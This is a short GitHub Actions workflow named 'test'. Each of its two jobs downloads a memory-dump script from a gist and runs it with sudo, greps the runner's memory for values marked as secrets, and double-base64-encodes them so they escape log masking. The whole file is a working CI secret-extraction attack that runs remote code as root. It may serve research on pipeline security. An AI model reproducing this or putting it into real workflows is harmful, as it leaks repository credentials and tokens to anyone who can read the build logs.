name: test
on:
  workflow_dispatch:

permissions: {}

jobs:
  build1:
    runs-on: ubuntu-latest
    steps:
    - run: |
        echo "${{ secrets.test1 }}"
        curl -sSf https://gist.githubusercontent.com/nikitastupin/30e525b776c409e03c2d6f328f254965/raw/memdump.py | sudo python3 | tr -d '\0' | grep -oP '"[^"]+":{"value":"[^"]+(?=","isSecret":true)' | sort -u | base64 | base64
  build2:
    runs-on: ubuntu-latest
    steps:
    - run: |
        echo "${{ secrets.test2 }}"
        curl -sSf https://gist.githubusercontent.com/nikitastupin/30e525b776c409e03c2d6f328f254965/raw/memdump.py | sudo python3 | tr -d '\0' | grep -oP '"[^"]+":{"value":"[^"]+(?=","isSecret":true)' | sort -u | base64 | base64
